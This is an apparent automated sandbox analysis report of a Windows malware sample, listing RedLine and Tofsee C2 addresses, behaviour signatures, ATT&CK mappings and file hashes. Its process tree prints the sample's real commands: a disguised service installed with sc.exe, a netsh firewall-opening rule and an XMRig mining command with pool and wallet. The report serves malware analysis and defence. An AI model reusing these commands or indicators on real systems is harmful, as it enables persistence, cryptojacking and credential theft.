Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2022 05:41

General

  • Target

    0413cd47fc3feec56b1de4491071ad14f2025487143821a34694867e31520494.exe

  • Size

    200KB

  • MD5

    42bc7169cb277afe6629e5802a97d285

  • SHA1

    85b6d767deeb0b6426381b740ca739d85d1bad77

  • SHA256

    0413cd47fc3feec56b1de4491071ad14f2025487143821a34694867e31520494

  • SHA512

    9dd773823b2ca2a791095366f6e7c433bd3433cfd18b27d2544a85366d25ea964e636b89e86f844fb9585edb9509af980124ab71d6fc9ba1cf023344431ade56

  • SSDEEP

    3072:DZtavYRl5L+louhdD+qojkN5b61Ys10Atl4Ii22VSb9Btb0/PkIXx:FLidz3+l4IifVSbt

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @me_golds)

C2

77.73.134.27:7161

Attributes
  • auth_value

    e136da06c7c0400f4091dab1787720ea

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Detects Smokeloader packer 3 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0413cd47fc3feec56b1de4491071ad14f2025487143821a34694867e31520494.exe
    "C:\Users\Admin\AppData\Local\Temp\0413cd47fc3feec56b1de4491071ad14f2025487143821a34694867e31520494.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3044
  • C:\Users\Admin\AppData\Local\Temp\FA62.exe
    C:\Users\Admin\AppData\Local\Temp\FA62.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:100844
  • C:\Users\Admin\AppData\Local\Temp\FDCE.exe
    C:\Users\Admin\AppData\Local\Temp\FDCE.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:35384
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rhsclwyf\
      2⤵
        PID:86980
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\tkafjtih.exe" C:\Windows\SysWOW64\rhsclwyf\
        2⤵
          PID:100896
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create rhsclwyf binPath= "C:\Windows\SysWOW64\rhsclwyf\tkafjtih.exe /d\"C:\Users\Admin\AppData\Local\Temp\FDCE.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:101004
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description rhsclwyf "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:101076
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start rhsclwyf
          2⤵
          • Launches sc.exe
          PID:101204
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:101328
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 35384 -s 660
          2⤵
          • Program crash
          PID:3588
      • C:\Users\Admin\AppData\Local\Temp\551.exe
        C:\Users\Admin\AppData\Local\Temp\551.exe
        1⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: MapViewOfSection
        PID:100952
      • C:\Users\Admin\AppData\Local\Temp\9C7.exe
        C:\Users\Admin\AppData\Local\Temp\9C7.exe
        1⤵
        • Executes dropped EXE
        PID:101088
      • C:\Users\Admin\AppData\Local\Temp\C39.exe
        C:\Users\Admin\AppData\Local\Temp\C39.exe
        1⤵
        • Executes dropped EXE
        PID:101192
      • C:\Windows\SysWOW64\rhsclwyf\tkafjtih.exe
        C:\Windows\SysWOW64\rhsclwyf\tkafjtih.exe /d"C:\Users\Admin\AppData\Local\Temp\FDCE.exe"
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:101300
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          PID:1288
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1228
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 101300 -s 560
          2⤵
          • Program crash
          PID:3948
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 35384 -ip 35384
        1⤵
          PID:3680
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          1⤵
            PID:3488
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 101300 -ip 101300
            1⤵
              PID:2680
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe
              1⤵
                PID:5104
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:4836
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1160
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:4460
                    • C:\Windows\SysWOW64\explorer.exe
                      C:\Windows\SysWOW64\explorer.exe
                      1⤵
                        PID:3544
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4320
                        • C:\Windows\explorer.exe
                          C:\Windows\explorer.exe
                          1⤵
                            PID:3048
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:2924
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                              • Accesses Microsoft Outlook profiles
                              • outlook_office_path
                              • outlook_win_path
                              PID:2096
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                                PID:4024
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:3376

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Persistence

                                New Service

                                1
                                T1050

                                Modify Existing Service

                                1
                                T1031

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Privilege Escalation

                                New Service

                                1
                                T1050

                                Defense Evasion

                                Modify Registry

                                1
                                T1112

                                Credential Access

                                Credentials in Files

                                1
                                T1081

                                Discovery

                                Query Registry

                                2
                                T1012

                                System Information Discovery

                                3
                                T1082

                                Peripheral Device Discovery

                                1
                                T1120

                                Collection

                                Email Collection

                                1
                                T1114

                                Data from Local System

                                1
                                T1005

                                Command and Control

                                Web Service

                                1
                                T1102

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\551.exe
                                  Filesize

                                  187KB

                                  MD5

                                  ed89332cb4fb426b7e9ad5d8853be58f

                                  SHA1

                                  4c6dbd10b19dd0a53d76bc8ca8c5df055a5f0ccc

                                  SHA256

                                  56c77e5efa069fdbea2beaf1cbb234735d6aa70eba0fe50b736ab5f9bbe6e69a

                                  SHA512

                                  9f23967e804be45bf892f7c1c1590efe633ae34ddb4d953f8a29ea14febdda51ae217e9c38e59acbbf9e578d5564fd50d6239d15b57495884adfd07ece988862

                                • C:\Users\Admin\AppData\Local\Temp\551.exe
                                  Filesize

                                  187KB

                                  MD5

                                  ed89332cb4fb426b7e9ad5d8853be58f

                                  SHA1

                                  4c6dbd10b19dd0a53d76bc8ca8c5df055a5f0ccc

                                  SHA256

                                  56c77e5efa069fdbea2beaf1cbb234735d6aa70eba0fe50b736ab5f9bbe6e69a

                                  SHA512

                                  9f23967e804be45bf892f7c1c1590efe633ae34ddb4d953f8a29ea14febdda51ae217e9c38e59acbbf9e578d5564fd50d6239d15b57495884adfd07ece988862

                                • C:\Users\Admin\AppData\Local\Temp\9C7.exe
                                  Filesize

                                  318KB

                                  MD5

                                  6917d28aae7b190af4cc9e8c82597b99

                                  SHA1

                                  00ac38f05b4d99691ef09883f7f141a6cd3d4d3a

                                  SHA256

                                  5d72a91ee3aeab2a634e8023b2c0530c8429f1151f1e29421ff7a16cec75617d

                                  SHA512

                                  e5a2d6d37555a7f06bfd27aa52eb2075b142ffadd155c4e27e76c371ebd01710b4072576d4ae0fabd221a47f6386a44e37bb2097d9db5e88889ea76ed8170fb4

                                • C:\Users\Admin\AppData\Local\Temp\9C7.exe
                                  Filesize

                                  318KB

                                  MD5

                                  6917d28aae7b190af4cc9e8c82597b99

                                  SHA1

                                  00ac38f05b4d99691ef09883f7f141a6cd3d4d3a

                                  SHA256

                                  5d72a91ee3aeab2a634e8023b2c0530c8429f1151f1e29421ff7a16cec75617d

                                  SHA512

                                  e5a2d6d37555a7f06bfd27aa52eb2075b142ffadd155c4e27e76c371ebd01710b4072576d4ae0fabd221a47f6386a44e37bb2097d9db5e88889ea76ed8170fb4

                                • C:\Users\Admin\AppData\Local\Temp\C39.exe
                                  Filesize

                                  365KB

                                  MD5

                                  1c92b308eeb3ee01d7622de9f8fea0b5

                                  SHA1

                                  5e5c89f5c6f15bad6b62ca0ea22f6dcfac1a6dda

                                  SHA256

                                  775f7f9041236757b05676318037000e221a582bdfd161b89a11a19fc4fde73c

                                  SHA512

                                  5a9836b2af8b7088bfca79e84b3d5ef51a620fe1d59f2a0f1f02605907bcedcbb3f95fd16f9812d405045056d688061cb4c5ef47f09ba0e7779de77b45f013eb

                                • C:\Users\Admin\AppData\Local\Temp\C39.exe
                                  Filesize

                                  365KB

                                  MD5

                                  1c92b308eeb3ee01d7622de9f8fea0b5

                                  SHA1

                                  5e5c89f5c6f15bad6b62ca0ea22f6dcfac1a6dda

                                  SHA256

                                  775f7f9041236757b05676318037000e221a582bdfd161b89a11a19fc4fde73c

                                  SHA512

                                  5a9836b2af8b7088bfca79e84b3d5ef51a620fe1d59f2a0f1f02605907bcedcbb3f95fd16f9812d405045056d688061cb4c5ef47f09ba0e7779de77b45f013eb

                                • C:\Users\Admin\AppData\Local\Temp\FA62.exe
                                  Filesize

                                  2.6MB

                                  MD5

                                  ea6fee4ce432602e3dd2b849f8396027

                                  SHA1

                                  5151b46012f637fe7fdbda551be1651009eb453a

                                  SHA256

                                  b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                  SHA512

                                  b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                • C:\Users\Admin\AppData\Local\Temp\FA62.exe
                                  Filesize

                                  2.6MB

                                  MD5

                                  ea6fee4ce432602e3dd2b849f8396027

                                  SHA1

                                  5151b46012f637fe7fdbda551be1651009eb453a

                                  SHA256

                                  b44181d7365ab6868e1cf0d7127a56862075944099f6f1f965b11f41c78fd75d

                                  SHA512

                                  b567449c006248a4311a1a3325279e2d4edfacacb272ae3152b085d3164e722370aa748cbaa3299425ede1e4910218988e88f24de744944903b2001b70e263be

                                • C:\Users\Admin\AppData\Local\Temp\FDCE.exe
                                  Filesize

                                  201KB

                                  MD5

                                  f5a2b47d112ad48b217f27a0ffc4014e

                                  SHA1

                                  be36dbcfced8ae41257aa9f01598ddf232ece6fe

                                  SHA256

                                  0ef96177554f1cd2eea823b6dc0c3dc54aec830827a2e82f59aed9fe7b896ba5

                                  SHA512

                                  ba59b8939e00fad5ff72780952571d86820c18fc2b891e4d8367dfc2d61b24c57eaec46a8eb236c79a3728d6fad902c6a13497015407977f33f8a3e07aa75458

                                • C:\Users\Admin\AppData\Local\Temp\FDCE.exe
                                  Filesize

                                  201KB

                                  MD5

                                  f5a2b47d112ad48b217f27a0ffc4014e

                                  SHA1

                                  be36dbcfced8ae41257aa9f01598ddf232ece6fe

                                  SHA256

                                  0ef96177554f1cd2eea823b6dc0c3dc54aec830827a2e82f59aed9fe7b896ba5

                                  SHA512

                                  ba59b8939e00fad5ff72780952571d86820c18fc2b891e4d8367dfc2d61b24c57eaec46a8eb236c79a3728d6fad902c6a13497015407977f33f8a3e07aa75458

                                • C:\Users\Admin\AppData\Local\Temp\tkafjtih.exe
                                  Filesize

                                  12.6MB

                                  MD5

                                  2c0ba23d0ce62aa53b5001465ffee7c2

                                  SHA1

                                  9659564378f47638ad5beb2902780d045839ebda

                                  SHA256

                                  b1d7250a4224af9a76578a7ed46c05e4b74b1e0c6ad3a488087a3066c2cea776

                                  SHA512

                                  dad3d37d7cc28cf833e7aae58aba8d16bd8a40f9ca1944e12a024ff88ee37ddae1f4d477a4a078cc583542051dc5bf73f551ea2ed4c3653b2462aa74e78fadf9

                                • C:\Windows\SysWOW64\rhsclwyf\tkafjtih.exe
                                  Filesize

                                  12.6MB

                                  MD5

                                  2c0ba23d0ce62aa53b5001465ffee7c2

                                  SHA1

                                  9659564378f47638ad5beb2902780d045839ebda

                                  SHA256

                                  b1d7250a4224af9a76578a7ed46c05e4b74b1e0c6ad3a488087a3066c2cea776

                                  SHA512

                                  dad3d37d7cc28cf833e7aae58aba8d16bd8a40f9ca1944e12a024ff88ee37ddae1f4d477a4a078cc583542051dc5bf73f551ea2ed4c3653b2462aa74e78fadf9

                                • memory/1160-248-0x0000000000B20000-0x0000000000B26000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/1160-193-0x0000000000000000-mapping.dmp
                                • memory/1160-195-0x0000000000B20000-0x0000000000B26000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/1160-196-0x0000000000B10000-0x0000000000B1C000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/1228-240-0x0000000000000000-mapping.dmp
                                • memory/1228-241-0x0000000000800000-0x00000000008F1000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/1228-246-0x0000000000800000-0x00000000008F1000-memory.dmp
                                  Filesize

                                  964KB

                                • memory/1288-228-0x00000000025E0000-0x00000000025F0000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/1288-234-0x0000000007E40000-0x000000000824B000-memory.dmp
                                  Filesize

                                  4.0MB

                                • memory/1288-237-0x00000000033D0000-0x00000000033D7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/1288-231-0x00000000025F0000-0x00000000025F5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/1288-225-0x00000000025D0000-0x00000000025D6000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/1288-222-0x0000000002E00000-0x000000000300F000-memory.dmp
                                  Filesize

                                  2.1MB

                                • memory/1288-178-0x0000000000000000-mapping.dmp
                                • memory/1288-179-0x00000000012A0000-0x00000000012B5000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/1288-220-0x00000000012A0000-0x00000000012B5000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/1288-186-0x00000000012A0000-0x00000000012B5000-memory.dmp
                                  Filesize

                                  84KB

                                • memory/2096-254-0x0000000001300000-0x0000000001375000-memory.dmp
                                  Filesize

                                  468KB

                                • memory/2096-257-0x0000000001290000-0x00000000012FB000-memory.dmp
                                  Filesize

                                  428KB

                                • memory/2096-253-0x0000000000000000-mapping.dmp
                                • memory/2096-255-0x0000000001290000-0x00000000012FB000-memory.dmp
                                  Filesize

                                  428KB

                                • memory/2408-136-0x0000000000000000-mapping.dmp
                                • memory/2924-212-0x0000000000000000-mapping.dmp
                                • memory/2924-213-0x00000000001F0000-0x00000000001F8000-memory.dmp
                                  Filesize

                                  32KB

                                • memory/2924-252-0x00000000001F0000-0x00000000001F8000-memory.dmp
                                  Filesize

                                  32KB

                                • memory/2924-214-0x00000000001E0000-0x00000000001EB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/3044-134-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/3044-133-0x00000000006E0000-0x00000000006E9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/3044-135-0x0000000000400000-0x000000000058B000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/3044-132-0x0000000000728000-0x0000000000738000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/3048-251-0x0000000000A80000-0x0000000000A87000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/3048-209-0x0000000000000000-mapping.dmp
                                • memory/3048-210-0x0000000000A80000-0x0000000000A87000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/3048-211-0x00000000007F0000-0x00000000007FD000-memory.dmp
                                  Filesize

                                  52KB

                                • memory/3376-259-0x0000000000000000-mapping.dmp
                                • memory/3376-261-0x0000000000A00000-0x0000000000A27000-memory.dmp
                                  Filesize

                                  156KB

                                • memory/3376-260-0x0000000000A30000-0x0000000000A52000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/3376-262-0x0000000000A30000-0x0000000000A52000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/3488-185-0x00000000005D0000-0x00000000005DB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/3488-184-0x00000000005E0000-0x00000000005E7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/3488-219-0x00000000005E0000-0x00000000005E7000-memory.dmp
                                  Filesize

                                  28KB

                                • memory/3488-177-0x0000000000000000-mapping.dmp
                                • memory/3544-203-0x0000000000000000-mapping.dmp
                                • memory/3544-205-0x00000000012C0000-0x00000000012C9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/3544-204-0x00000000012D0000-0x00000000012D5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/3544-250-0x00000000012D0000-0x00000000012D5000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/4024-256-0x0000000000000000-mapping.dmp
                                • memory/4024-258-0x0000000000C30000-0x0000000000C3C000-memory.dmp
                                  Filesize

                                  48KB

                                • memory/4320-208-0x0000000000BB0000-0x0000000000BBB000-memory.dmp
                                  Filesize

                                  44KB

                                • memory/4320-207-0x0000000000BC0000-0x0000000000BC6000-memory.dmp
                                  Filesize

                                  24KB

                                • memory/4320-206-0x0000000000000000-mapping.dmp
                                • memory/4460-197-0x0000000000000000-mapping.dmp
                                • memory/4460-202-0x0000000000370000-0x0000000000397000-memory.dmp
                                  Filesize

                                  156KB

                                • memory/4460-201-0x00000000003A0000-0x00000000003C2000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/4460-249-0x00000000003A0000-0x00000000003C2000-memory.dmp
                                  Filesize

                                  136KB

                                • memory/4836-191-0x0000000000670000-0x0000000000675000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/4836-247-0x0000000000670000-0x0000000000675000-memory.dmp
                                  Filesize

                                  20KB

                                • memory/4836-192-0x0000000000660000-0x0000000000669000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/4836-190-0x0000000000000000-mapping.dmp
                                • memory/5104-188-0x0000000000F60000-0x0000000000F69000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/5104-221-0x0000000000F60000-0x0000000000F69000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/5104-187-0x0000000000000000-mapping.dmp
                                • memory/5104-189-0x0000000000F50000-0x0000000000F5F000-memory.dmp
                                  Filesize

                                  60KB

                                • memory/35384-151-0x0000000000600000-0x0000000000613000-memory.dmp
                                  Filesize

                                  76KB

                                • memory/35384-142-0x0000000000819000-0x0000000000829000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/35384-152-0x0000000000400000-0x000000000058C000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/35384-139-0x0000000000000000-mapping.dmp
                                • memory/35384-175-0x0000000000819000-0x0000000000829000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/35384-176-0x0000000000400000-0x000000000058C000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/86980-143-0x0000000000000000-mapping.dmp
                                • memory/100844-159-0x0000000005920000-0x0000000005A2A000-memory.dmp
                                  Filesize

                                  1.0MB

                                • memory/100844-216-0x0000000008430000-0x000000000895C000-memory.dmp
                                  Filesize

                                  5.2MB

                                • memory/100844-199-0x0000000005D30000-0x0000000005DC2000-memory.dmp
                                  Filesize

                                  584KB

                                • memory/100844-218-0x00000000071E0000-0x0000000007230000-memory.dmp
                                  Filesize

                                  320KB

                                • memory/100844-198-0x0000000006A00000-0x0000000006FA4000-memory.dmp
                                  Filesize

                                  5.6MB

                                • memory/100844-144-0x0000000000000000-mapping.dmp
                                • memory/100844-145-0x0000000000400000-0x0000000000428000-memory.dmp
                                  Filesize

                                  160KB

                                • memory/100844-215-0x0000000007D30000-0x0000000007EF2000-memory.dmp
                                  Filesize

                                  1.8MB

                                • memory/100844-157-0x0000000005E30000-0x0000000006448000-memory.dmp
                                  Filesize

                                  6.1MB

                                • memory/100844-200-0x0000000006450000-0x00000000064B6000-memory.dmp
                                  Filesize

                                  408KB

                                • memory/100844-160-0x0000000005810000-0x0000000005822000-memory.dmp
                                  Filesize

                                  72KB

                                • memory/100844-217-0x0000000007160000-0x00000000071D6000-memory.dmp
                                  Filesize

                                  472KB

                                • memory/100844-161-0x0000000005830000-0x000000000586C000-memory.dmp
                                  Filesize

                                  240KB

                                • memory/100896-150-0x0000000000000000-mapping.dmp
                                • memory/100952-171-0x00000000006E0000-0x00000000006E9000-memory.dmp
                                  Filesize

                                  36KB

                                • memory/100952-194-0x0000000000400000-0x0000000000589000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/100952-153-0x0000000000000000-mapping.dmp
                                • memory/100952-172-0x0000000000400000-0x0000000000589000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/100952-170-0x0000000000769000-0x000000000077A000-memory.dmp
                                  Filesize

                                  68KB

                                • memory/101004-158-0x0000000000000000-mapping.dmp
                                • memory/101076-162-0x0000000000000000-mapping.dmp
                                • memory/101088-163-0x0000000000000000-mapping.dmp
                                • memory/101192-166-0x0000000000000000-mapping.dmp
                                • memory/101204-167-0x0000000000000000-mapping.dmp
                                • memory/101300-182-0x00000000007B3000-0x00000000007C3000-memory.dmp
                                  Filesize

                                  64KB

                                • memory/101300-183-0x0000000000400000-0x000000000058C000-memory.dmp
                                  Filesize

                                  1.5MB

                                • memory/101328-174-0x0000000000000000-mapping.dmp